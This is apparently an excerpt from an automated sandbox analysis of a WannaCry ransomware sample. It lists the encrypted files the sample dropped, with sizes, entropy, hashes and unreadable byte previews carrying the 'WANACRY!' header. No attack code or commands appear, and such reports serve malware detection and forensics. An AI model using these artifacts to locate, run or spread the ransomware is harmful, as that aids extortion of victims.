                                                                                      Preview:WANACRY!...........o.....6.\g0X..e.Q......\UM....V.t.]6Z.....Htg.AO.Q..6S...._...._.vP=...X..D..... F...s.p...vRG....F.9.......".;L.4-....%..j.:{cL.W.p~Jb. .5a..4.i.../...../.K....@...qB..oEw.......KY.$...x.0r...|(.,...u.7i..Q....R.\...0N..4..?3.B*....`............7.*...$....~.@..]..h~....X.y.a_4C0$M...Ej..C.g.,..FI...hv..@:k..J.9..h....Y..+:.Ej..aq.........Q.lk...3.B.~.d.....Oa....!..S./.K<U..U.$.:R.Z.#....u.k..l..?..Z..$.!.z....`l.Q)R=..S..P...>I....8.A...|.{.......o1...z. 6R....>\...h....G.H[.sw:?.I.m..R.&..rq09.:.=|..E...&s.x..O.....~......I...I1W<.p..:..S\.oW.k...eX....-.w#O...(....7PI.Mb]...ui...W\GI..w.... ..')....u..jp.\e./.....xAS../....AG.F...M.....#V.A.Ay..1.D.d^..g...."v.8..U. .k'*!.p#!.iI....e.^......:w...)..m}..d.A.W..1.m)..2C....c.7j|.I....2.x?.N..tm.[.gy).~nEb.1....G..B........+....<X....-Pq..O.g......#......{.W..l.i.....i. ...n....a.e.a.....L/?.7.......I..j..H..*.D..Q..ycH.nW..v.....w.p...k...@..E.:.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1848
                                                                                      Entropy (8bit):7.891980865425103
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkJtB+vOKkxrYIRssNtvK7H1I5fzbc5AYHK5W9l/:ohPQsN5mH1uUA+KID/
                                                                                      MD5:23EF10766D072D4660056713F2212015
                                                                                      SHA1:4C2EC352A220C24047F8B43900F88DBF93169CA6
                                                                                      SHA-256:9CC3321EE33726480ECAC7CC07CE2B834B8DC4F9A901213500AAD4A733B82921
                                                                                      SHA-512:ED882353D5EEBF581758FEB0DC5CFD440B4D61E0A6687A8AA236C3B47E322145A4A0AAEA64F8042ACF0EFF33A099D2A7A3BD7C41E0AC0BC3156A98732B499A6F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........o.....6.\g0X..e.Q......\UM....V.t.]6Z.....Htg.AO.Q..6S...._...._.vP=...X..D..... F...s.p...vRG....F.9.......".;L.4-....%..j.:{cL.W.p~Jb. .5a..4.i.../...../.K....@...qB..oEw.......KY.$...x.0r...|(.,...u.7i..Q....R.\...0N..4..?3.B*....`............7.*...$....~.@..]..h~....X.y.a_4C0$M...Ej..C.g.,..FI...hv..@:k..J.9..h....Y..+:.Ej..aq.........Q.lk...3.B.~.d.....Oa....!..S./.K<U..U.$.:R.Z.#....u.k..l..?..Z..$.!.z....`l.Q)R=..S..P...>I....8.A...|.{.......o1...z. 6R....>\...h....G.H[.sw:?.I.m..R.&..rq09.:.=|..E...&s.x..O.....~......I...I1W<.p..:..S\.oW.k...eX....-.w#O...(....7PI.Mb]...ui...W\GI..w.... ..')....u..jp.\e./.....xAS../....AG.F...M.....#V.A.Ay..1.D.d^..g...."v.8..U. .k'*!.p#!.iI....e.^......:w...)..m}..d.A.W..1.m)..2C....c.7j|.I....2.x?.N..tm.[.gy).~nEb.1....G..B........+....<X....-Pq..O.g......#......{.W..l.i.....i. ...n....a.e.a.....L/?.7.......I..j..H..*.D..Q..ycH.nW..v.....w.p...k...@..E.:.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2664
                                                                                      Entropy (8bit):7.925791197268616
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkQugxpaQSbON7caTKrqC0n0z9E+ndZZQEbMH+4MQ/df0rE1+L92QjGx1:oQbpac7cx2C00z9EEdbpMHZZdc2QSv
                                                                                      MD5:B2C28981F0C38B18D7E635F1FCCBBD19
                                                                                      SHA1:B25067E30ED6F33B08D6324B81E7EB0BB0916C15
                                                                                      SHA-256:DB40065B26597EA9FEB1D6097D8122811B0C9CDBC6B04C121ECC89B35BA3CE11
                                                                                      SHA-512:5FB5798C1838D1844F0598AF965CC33E78C4A6B54ABDE8D8B164D08446E80ADBB55A3FAE1242994B507B0C2DE72DECB7102A8BD3FFFAAA7E968450462CE83CE7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....(k.....R.o..>........h..w...O..69eZ...#....$.....^...<..........W/..G3]..e{......@.Xs.:....$k...X..;[....b`Ug?..s..f.E..B-#..5.c....*C&.vF..\..... ..V.h..C.....M.J....*.4..J..|t.\s.........!...s...A.....P..3...P.a...V......7OK..eu.r>.`..;.....M...............0.S..d..n.E..D.b...n.....1s.u..r}..B.[.....c..w..q]2.%..S.&..Z..>7....|..2....fJCM...b..........nx....U.....lj.O.I.yr.'.S...^..V&E+....Y#l......./....d6$4!S.E.C'.j.=....*p..&..v/......}H..@D...mf......G@..~."!....]....3.".ML......sGH.`..K..+<..P.C..Z\...r.J.r6i.%.mK..v..2V.[.....E..5.3q..*.+.;.Z.....P .u............Y2.Ep...}...[.7u....]..N:.=t..Q..j;a\.<....#..z.n..I....y........k.@..{.1NN.N.N..V....^...T.}....|..,.......O..j..[-..).A.....e..,.H,...!%.W.mzn.....op,y..=.....o../..J..S7.`$..%r@OJ..{.a...`6G...n....N...yM.*.$e. *.4. ....Z.,N.Ab..qE..3.)..z....v.3...S3...|O5...>B..`.M`]%...%%.q ...,..^n.8tZY.#M%.._.....po$.k..$.......o..I..o.c..y{...u[\.....m`.z.j...4.`.h..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2664
                                                                                      Entropy (8bit):7.925791197268616
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkQugxpaQSbON7caTKrqC0n0z9E+ndZZQEbMH+4MQ/df0rE1+L92QjGx1:oQbpac7cx2C00z9EEdbpMHZZdc2QSv
                                                                                      MD5:B2C28981F0C38B18D7E635F1FCCBBD19
                                                                                      SHA1:B25067E30ED6F33B08D6324B81E7EB0BB0916C15
                                                                                      SHA-256:DB40065B26597EA9FEB1D6097D8122811B0C9CDBC6B04C121ECC89B35BA3CE11
                                                                                      SHA-512:5FB5798C1838D1844F0598AF965CC33E78C4A6B54ABDE8D8B164D08446E80ADBB55A3FAE1242994B507B0C2DE72DECB7102A8BD3FFFAAA7E968450462CE83CE7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....(k.....R.o..>........h..w...O..69eZ...#....$.....^...<..........W/..G3]..e{......@.Xs.:....$k...X..;[....b`Ug?..s..f.E..B-#..5.c....*C&.vF..\..... ..V.h..C.....M.J....*.4..J..|t.\s.........!...s...A.....P..3...P.a...V......7OK..eu.r>.`..;.....M...............0.S..d..n.E..D.b...n.....1s.u..r}..B.[.....c..w..q]2.%..S.&..Z..>7....|..2....fJCM...b..........nx....U.....lj.O.I.yr.'.S...^..V&E+....Y#l......./....d6$4!S.E.C'.j.=....*p..&..v/......}H..@D...mf......G@..~."!....]....3.".ML......sGH.`..K..+<..P.C..Z\...r.J.r6i.%.mK..v..2V.[.....E..5.3q..*.+.;.Z.....P .u............Y2.Ep...}...[.7u....]..N:.=t..Q..j;a\.<....#..z.n..I....y........k.@..{.1NN.N.N..V....^...T.}....|..,.......O..j..[-..).A.....e..,.H,...!%.W.mzn.....op,y..=.....o../..J..S7.`$..%r@OJ..{.a...`6G...n....N...yM.*.$e. *.4. ....Z.,N.Ab..qE..3.)..z....v.3...S3...|O5...>B..`.M`]%...%%.q ...,..^n.8tZY.#M%.._.....po$.k..$.......o..I..o.c..y{...u[\.....m`.z.j...4.`.h..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3288
                                                                                      Entropy (8bit):7.940551928602861
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJK3gqpvhWY0xDE//SHnkylQIIy0kbF6GbE:UKlvhWY0OXMnEkbhE
                                                                                      MD5:A9135064A6F30B3C6CE18361B20A1C22
                                                                                      SHA1:ACA08A819BBE53CDE1A5166BF1F6FDFC5AEAE2FC
                                                                                      SHA-256:DBA67E0FAB0F6F4F500DE58ED63AA80830D254C2242504B94F5EFBD00E60FE10
                                                                                      SHA-512:410F442B5C452B1D38D5F19E9865725B9925CFAC2D1E6A45CFBC09BBBBF332B1A1E22C8F742D33298DE1593AA01AA103703D72ED98E5267EA8C96CDE04BAEF19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......:..j..5......V6j..q;.H.B......%-....vR#.c..pg.T......fK...x.d..V]'v...w2....}.\y'...h......Y....M.P..v3 ...?.........R.5m..AT...^.:[.ns....R...spf..........Vh.h..D....w.'EL.a...+h@...%,9.[.....O0.....SH}.#W.h/(......#..0.....EW2.?%H@................97U..3>..w....:A8.P..:f..N...[...u.7V6.4.X.o........{...X.B.._.F..L..jU^..nD.I>f|...NO............c...D.._..-.::Y..3h.q....y..2......}...i..A..F9@....~..(e.wcy.T..Kh/..%..L.J..C..,k......Eh...5..6..{.L...Q6.f..p+-..iJP7,...N?.wd.....fr..U\...xgh.1u.....R.|..#nI..w.Am.o._.S ......pV....|h;U.....z.....d..j.>....F.E2..L..X.^w[|.k..g>..?........Bw'.5.....7O....`.v[.b.%..,.C.w.M*....9s.#.qu.....d..8....!...p.../.......Z.....J.xu.?..#6....(..3/.,.JJo.Z..E.....G.7.....E.......".Z..py.1ytK|....w/w..;......vJG..S..a.S.Ed..n..Rj.K....^.g.ox\.r......A..2..kD.SX_.CK8`0.Z"..}}c...g.".. .l..Q....@..y.pH-...:..6.Hg8.....+~10..D."..h$...I...aW...=...J......@..>.>..e...)...%.....!.M?!ob09.uH.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3288
                                                                                      Entropy (8bit):7.940551928602861
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJK3gqpvhWY0xDE//SHnkylQIIy0kbF6GbE:UKlvhWY0OXMnEkbhE
                                                                                      MD5:A9135064A6F30B3C6CE18361B20A1C22
                                                                                      SHA1:ACA08A819BBE53CDE1A5166BF1F6FDFC5AEAE2FC
                                                                                      SHA-256:DBA67E0FAB0F6F4F500DE58ED63AA80830D254C2242504B94F5EFBD00E60FE10
                                                                                      SHA-512:410F442B5C452B1D38D5F19E9865725B9925CFAC2D1E6A45CFBC09BBBBF332B1A1E22C8F742D33298DE1593AA01AA103703D72ED98E5267EA8C96CDE04BAEF19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......:..j..5......V6j..q;.H.B......%-....vR#.c..pg.T......fK...x.d..V]'v...w2....}.\y'...h......Y....M.P..v3 ...?.........R.5m..AT...^.:[.ns....R...spf..........Vh.h..D....w.'EL.a...+h@...%,9.[.....O0.....SH}.#W.h/(......#..0.....EW2.?%H@................97U..3>..w....:A8.P..:f..N...[...u.7V6.4.X.o........{...X.B.._.F..L..jU^..nD.I>f|...NO............c...D.._..-.::Y..3h.q....y..2......}...i..A..F9@....~..(e.wcy.T..Kh/..%..L.J..C..,k......Eh...5..6..{.L...Q6.f..p+-..iJP7,...N?.wd.....fr..U\...xgh.1u.....R.|..#nI..w.Am.o._.S ......pV....|h;U.....z.....d..j.>....F.E2..L..X.^w[|.k..g>..?........Bw'.5.....7O....`.v[.b.%..,.C.w.M*....9s.#.qu.....d..8....!...p.../.......Z.....J.xu.?..#6....(..3/.,.JJo.Z..E.....G.7.....E.......".Z..py.1ytK|....w/w..;......vJG..S..a.S.Ed..n..Rj.K....^.g.ox\.r......A..2..kD.SX_.CK8`0.Z"..}}c...g.".. .l..Q....@..y.pH-...:..6.Hg8.....+~10..D."..h$...I...aW...=...J......@..>.>..e...)...%.....!.M?!ob09.uH.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4136
                                                                                      Entropy (8bit):7.9541743216025065
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oE91NHbtUxA8uEZssd+ilj6Iq98MGbgTdcrtBGdVJf6FCV:vWx5uRdilBq6lyV
                                                                                      MD5:7B4BE011F88BA16ABFAB5671286DF79B
                                                                                      SHA1:8C124B7D4DCF59AB290557EDF8322EA5FDEE473D
                                                                                      SHA-256:66DCC47526F3C7B58764B6BABC945F10AB9BE5597C93360B6EEF72A5C523F547
                                                                                      SHA-512:083C102287BFC5418328606255DE47FF23621FB678C35EFEDB7F12CB5A677C2F67CFB9243375267930C6EA22D246924CFB3573E94CD75E2930D0CF392E2868DD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f...[.X....x.Q....-...X...KBF......*..p..)u...3..<.].G.]..=.j..]...`..6jf<.oS....X..Uf;[9..U.....k.8.rs..."H......;....m...(..y.`....... .A..^.....~.....%[....i...F.)G.i....o&...N.<.......Hi..z0=#j...X.....LS.N"B.sh....:......@.>..h',~.$.L%................Y.h6.....$_q-...%...G.7....ZIGw....=2....F...%......}^.IJ....d...Q.@.g...ZfB.8m#,.S<-............./..a.s.}LG/x6<...)..gv&Fl.i:Q...Bu)...i....".nx(.a{....>.(....@.....I...I.7...._......uG.!A...y9...M*F...dW..j..A..2...^..:H5|b.~g6n..i...5...(.\.......JK....l.5:?...C..o...Y.._.t..N}..............."....W....W.v.."..!.f+w..e...S......C..F+....U.nJz..f.+,.O...K...f..kf}X..&..z...k....M7uf5......|..5...^.c........m..c..+..t.......H.e.Qb. .>.sg`.2...`.~..>%...!..F.lq|..n..-....f...O..,.5./P...k. [bi.].../....-...aJ4.u..HA.-.D...]vY....?.BH.u.k..Q.D-3.N.TkN.:.0q.'.N...u....U..YE..T.y.2CF.8..<2:.'..Bh. ...1.o..U....k,k./vQ.,..l...d....c....n`t.;MWT..K.#.e....^.."./t..^&...;..&.........]!...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4136
                                                                                      Entropy (8bit):7.9541743216025065
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oE91NHbtUxA8uEZssd+ilj6Iq98MGbgTdcrtBGdVJf6FCV:vWx5uRdilBq6lyV
                                                                                      MD5:7B4BE011F88BA16ABFAB5671286DF79B
                                                                                      SHA1:8C124B7D4DCF59AB290557EDF8322EA5FDEE473D
                                                                                      SHA-256:66DCC47526F3C7B58764B6BABC945F10AB9BE5597C93360B6EEF72A5C523F547
                                                                                      SHA-512:083C102287BFC5418328606255DE47FF23621FB678C35EFEDB7F12CB5A677C2F67CFB9243375267930C6EA22D246924CFB3573E94CD75E2930D0CF392E2868DD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f...[.X....x.Q....-...X...KBF......*..p..)u...3..<.].G.]..=.j..]...`..6jf<.oS....X..Uf;[9..U.....k.8.rs..."H......;....m...(..y.`....... .A..^.....~.....%[....i...F.)G.i....o&...N.<.......Hi..z0=#j...X.....LS.N"B.sh....:......@.>..h',~.$.L%................Y.h6.....$_q-...%...G.7....ZIGw....=2....F...%......}^.IJ....d...Q.@.g...ZfB.8m#,.S<-............./..a.s.}LG/x6<...)..gv&Fl.i:Q...Bu)...i....".nx(.a{....>.(....@.....I...I.7...._......uG.!A...y9...M*F...dW..j..A..2...^..:H5|b.~g6n..i...5...(.\.......JK....l.5:?...C..o...Y.._.t..N}..............."....W....W.v.."..!.f+w..e...S......C..F+....U.nJz..f.+,.O...K...f..kf}X..&..z...k....M7uf5......|..5...^.c........m..c..+..t.......H.e.Qb. .>.sg`.2...`.~..>%...!..F.lq|..n..-....f...O..,.5./P...k. [bi.].../....-...aJ4.u..HA.-.D...]vY....?.BH.u.k..Q.D-3.N.TkN.:.0q.'.N...u....U..YE..T.y.2CF.8..<2:.'..Bh. ...1.o..U....k,k./vQ.,..l...d....c....n`t.;MWT..K.#.e....^.."./t..^&...;..&.........]!...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2216
                                                                                      Entropy (8bit):7.9017659314566515
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk1J6fNbifmAqaoVMAper2V5i8InRKum1dbvmd9yFC8x+c9XnEvDyqGswC9d:oTSbiOA9wDlxcxEpuzqC8x+63Gu9sXv
                                                                                      MD5:028C3CA439566EACA0AAB6BBA4AAE970
                                                                                      SHA1:AE8B461F80E97FABB1A02BEB34D28D1C968E69FC
                                                                                      SHA-256:31363A421F08EFE19D81EE02705986267D82A667804999E30BD48216D842186C
                                                                                      SHA-512:990E804F71EFFB0E79054E9DADDA90BE5F071D7C713B1A0B94A0738A75FFA4867FAC37614FD25D4F6E97A57CB34CC3F04382CAD00346B24F73396B9DDB505165
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Q.q.....tC..,..dU J..C.p.7...^..A...3.....K:.A...k;-d=z..sQd.....44z.bF.7..K-j.....`.8.E.y"f.4R..,<1R.,.......\.,..P....pxr..%.Zi|....|ZA.s.}.C..&..*4..(o..]R`.....#.....]...%D-m.Mt*.l3.21.^b..*.{.r..^............>*..}...x.3....)...a.k-...u.$...................Q..q.h.:.a........F.....a.........Le.}5-...Y.B.I./...)_#..).b}.-l...^......Al...h9..p.x...*|..T..l.g...b...\O.W.z1.u3M.ZNT..~v...r.#%P..o!.~..SI.kP....&.\b2/..;e...(.yBVp[.g.7..T.N..Zy..J2L-3..6.<..E.a...W.........C..V.E...B.y.uG....C.....~..P\ .O !RJ.....N.........h..((U.t..M{..;.w..:#E.g.m..w............m.w....^........d....\..p{.Y.Z. D..^.^H.'hLM..s...T.Oo.Q......u.\(.!..ZB....v/` mw.7....<...+*.Fq.. &.Vk..F...Q.%Y..P7.C....6K4&9..$........b.y../mmbc...;b.I|9....Y.+..D/.AM+....}.........5LF.D..2....Z..9+xX..?....IV.2k.....P......1.VB...V.p....I.Pn....80...+zw.K...w,...$.%..J._.r.L..*^\.-.d.h..tud.NI4.G..!x..0..P.B.......`.V.@.g.@..y.2..Dv.Y\....v.C.a...Xm.....w.c..s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2216
                                                                                      Entropy (8bit):7.9017659314566515
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk1J6fNbifmAqaoVMAper2V5i8InRKum1dbvmd9yFC8x+c9XnEvDyqGswC9d:oTSbiOA9wDlxcxEpuzqC8x+63Gu9sXv
                                                                                      MD5:028C3CA439566EACA0AAB6BBA4AAE970
                                                                                      SHA1:AE8B461F80E97FABB1A02BEB34D28D1C968E69FC
                                                                                      SHA-256:31363A421F08EFE19D81EE02705986267D82A667804999E30BD48216D842186C
                                                                                      SHA-512:990E804F71EFFB0E79054E9DADDA90BE5F071D7C713B1A0B94A0738A75FFA4867FAC37614FD25D4F6E97A57CB34CC3F04382CAD00346B24F73396B9DDB505165
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....Q.q.....tC..,..dU J..C.p.7...^..A...3.....K:.A...k;-d=z..sQd.....44z.bF.7..K-j.....`.8.E.y"f.4R..,<1R.,.......\.,..P....pxr..%.Zi|....|ZA.s.}.C..&..*4..(o..]R`.....#.....]...%D-m.Mt*.l3.21.^b..*.{.r..^............>*..}...x.3....)...a.k-...u.$...................Q..q.h.:.a........F.....a.........Le.}5-...Y.B.I./...)_#..).b}.-l...^......Al...h9..p.x...*|..T..l.g...b...\O.W.z1.u3M.ZNT..~v...r.#%P..o!.~..SI.kP....&.\b2/..;e...(.yBVp[.g.7..T.N..Zy..J2L-3..6.<..E.a...W.........C..V.E...B.y.uG....C.....~..P\ .O !RJ.....N.........h..((U.t..M{..;.w..:#E.g.m..w............m.w....^........d....\..p{.Y.Z. D..^.^H.'hLM..s...T.Oo.Q......u.\(.!..ZB....v/` mw.7....<...+*.Fq.. &.Vk..F...Q.%Y..P7.C....6K4&9..$........b.y../mmbc...;b.I|9....Y.+..D/.AM+....}.........5LF.D..2....Z..9+xX..?....IV.2k.....P......1.VB...V.p....I.Pn....80...+zw.K...w,...$.%..J._.r.L..*^\.-.d.h..tud.NI4.G..!x..0..P.B.......`.V.@.g.@..y.2..Dv.Y\....v.C.a...Xm.....w.c..s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1496
                                                                                      Entropy (8bit):7.8689578038068975
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDtuJZ5Uns+GP7++oOYzzJLupNO6/bsOpTeiNXAR4b1FtVNzOgaUwJ/jxygGgDO:bkDI5UnsTP7++oGp//DxpNXARa1nzOgh
                                                                                      MD5:E8827B69B60D2E4111539E214BD76F1F
                                                                                      SHA1:16F8B0342959373B763BF526416B0A1DCCF10583
                                                                                      SHA-256:17AAE2DC1A4D6028B5C1FCE664029313D662D24544025090F5B8FE211D2A4D2A
                                                                                      SHA-512:4824A521F80C887788CD8170903D94BFB2FFA42A2515DD03C6B8DE9CBF1278ED18D65B55F2B67ABBC0F32001303A2C8D194D65E5512D54CFF41403D4FB557777
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....%..i...7P..@..2..I....%.6K.'...9b..0O...:.|.A....g.z~x0|.pF7.N..FCBW|.....=p.,..v.\.XL..*..p...Y...@..F.$.....T..,.#.%..$..|9..r..5A.,...Z^.h.?.).g..-.Kz<~..8.0.x.l.D!.t.....G..r....Z'.....!.K{....Zt.'9.+@..w..D.c;`..C|bq`.i..x......h.6|=...............<.R......)%..(......M...9...1.;!!.W.2....}mq.....?..'.y;_.=...R....s..R..s.\.."..c...,..e'.Lr........O.ne3.t...M..".....8L......_6G.gw.x.5U.... 3..5..{._mU..!...H'r............/.....f..fQ.T.l.(0.(}.|....f.. ...S.^.%.......o!@....~.?..O....`.BE.t.........2w.Af.o....<4..(..{.....H.$..A.T..Co.j...N._..lS+..~...a.e=.yf.gw.I`...)..EMk.wY.fe..c.2>.^....-..-.J5.0...cD&....(.)x._c.....oVZ`....ln.|c.d.4.../......Y(.2.`.&...R..JkE16.U?...w....PV8[..$.=c...|WI........Z=.'v.[.t..)Bm....Q..H.......J\vL>..{-X...m....Nz.*...qyC..3..e.....w@...CB...MT...#||N....eg..j.c ..JF.....}#..s....3............uv...m.}4.e}.W...NLJ.. ....L..."..Fl...m..;..95..]..n(........Q.:n&..^Qbo...M..Q.].......z(.m..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1496
                                                                                      Entropy (8bit):7.8689578038068975
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDtuJZ5Uns+GP7++oOYzzJLupNO6/bsOpTeiNXAR4b1FtVNzOgaUwJ/jxygGgDO:bkDI5UnsTP7++oGp//DxpNXARa1nzOgh
                                                                                      MD5:E8827B69B60D2E4111539E214BD76F1F
                                                                                      SHA1:16F8B0342959373B763BF526416B0A1DCCF10583
                                                                                      SHA-256:17AAE2DC1A4D6028B5C1FCE664029313D662D24544025090F5B8FE211D2A4D2A
                                                                                      SHA-512:4824A521F80C887788CD8170903D94BFB2FFA42A2515DD03C6B8DE9CBF1278ED18D65B55F2B67ABBC0F32001303A2C8D194D65E5512D54CFF41403D4FB557777
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....%..i...7P..@..2..I....%.6K.'...9b..0O...:.|.A....g.z~x0|.pF7.N..FCBW|.....=p.,..v.\.XL..*..p...Y...@..F.$.....T..,.#.%..$..|9..r..5A.,...Z^.h.?.).g..-.Kz<~..8.0.x.l.D!.t.....G..r....Z'.....!.K{....Zt.'9.+@..w..D.c;`..C|bq`.i..x......h.6|=...............<.R......)%..(......M...9...1.;!!.W.2....}mq.....?..'.y;_.=...R....s..R..s.\.."..c...,..e'.Lr........O.ne3.t...M..".....8L......_6G.gw.x.5U.... 3..5..{._mU..!...H'r............/.....f..fQ.T.l.(0.(}.|....f.. ...S.^.%.......o!@....~.?..O....`.BE.t.........2w.Af.o....<4..(..{.....H.$..A.T..Co.j...N._..lS+..~...a.e=.yf.gw.I`...)..EMk.wY.fe..c.2>.^....-..-.J5.0...cD&....(.)x._c.....oVZ`....ln.|c.d.4.../......Y(.2.`.&...R..JkE16.U?...w....PV8[..$.=c...|WI........Z=.'v.[.t..)Bm....Q..H.......J\vL>..{-X...m....Nz.*...qyC..3..e.....w@...CB...MT...#||N....eg..j.c ..JF.....}#..s....3............uv...m.}4.e}.W...NLJ.. ....L..."..Fl...m..;..95..]..n(........Q.:n&..^Qbo...M..Q.].......z(.m..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4328
                                                                                      Entropy (8bit):7.953113057784566
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:orX/nq/mxEnOb7YjTgFJDBVggFdWuk5tjtyX9Gf6ZnSdx:g/n+mxEYYjTg3DBat7r6tSdx
                                                                                      MD5:38006AA13B0921A944CC1F21D2161421
                                                                                      SHA1:1990D7CE85D5AF9805C97D638D48BB9817584F47
                                                                                      SHA-256:3F93F6580FB525262E0055ED004028AEC72D470B4E7C3CA05EE2022D45759337
                                                                                      SHA-512:95ABF9DAE0D79B8301B6FC499773F62D3F20764A717E8745C327D8622830B383CD3152C8DFFBF13763D7E8A2AA06883BE125F6F7CDB2B2AFBB1792C3E9721431
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....qB..e...R..=.b.0.J.8...n.4a...`.......q.{.P..^..o.....bx....'.W...]:Wf\.c[....HA...(e...3....6.F..z....EG..m...1.]..0............Q+..X..dK..eZ.T{5.Q....*RF..Tm....^..s......$.....x...p=f.G......c.u.,!.....E..U....2.6....b..F..+..._.e.>...b...>.R............*!.l.......S.C...#.w......R....M.&iY...k..qK.....x.R...e.N....K;D\..L\....._wG{.=.....4..1Jbc..Cny....'.{...|j.b..X.... _H...^.L...S[......>.......%.A..Q.ra..@.w..."Q..y@.).;.O.......*..v....(.[..f P...0`..&.5C.../.8.Jd(E.P.."...3.6...G...}.~A...3...v........F.kp.7j.Lr|G..A.#%.*..).v..\F.[....|e.....+..HP.q%..4W....2.g`!..Z.A..f..gy.e:..<...*S.ynO:NS.._R..+y1.x5..n.R..c)..!;lw...}66.....(/......!....KV..A....l...).x*..j.....d...._I.....N.&.'.&.V.;.OA......&./....;..x.jDa...q,4Bt.U|./G..>x^".......H..2r....~u..QA^.h70i#}q.|^?v7....J._......xG^...= .}..}t..;u.c}..........d...}..[....:-..h..ch.....P..]7..9).C..|........~}=,Sw...../........={2.......f.O..J...v...0.F.R7F.^....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4328
                                                                                      Entropy (8bit):7.953113057784566
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:orX/nq/mxEnOb7YjTgFJDBVggFdWuk5tjtyX9Gf6ZnSdx:g/n+mxEYYjTg3DBat7r6tSdx
                                                                                      MD5:38006AA13B0921A944CC1F21D2161421
                                                                                      SHA1:1990D7CE85D5AF9805C97D638D48BB9817584F47
                                                                                      SHA-256:3F93F6580FB525262E0055ED004028AEC72D470B4E7C3CA05EE2022D45759337
                                                                                      SHA-512:95ABF9DAE0D79B8301B6FC499773F62D3F20764A717E8745C327D8622830B383CD3152C8DFFBF13763D7E8A2AA06883BE125F6F7CDB2B2AFBB1792C3E9721431
                                                                                      Malicious:false
                                                                                      Reputation:low
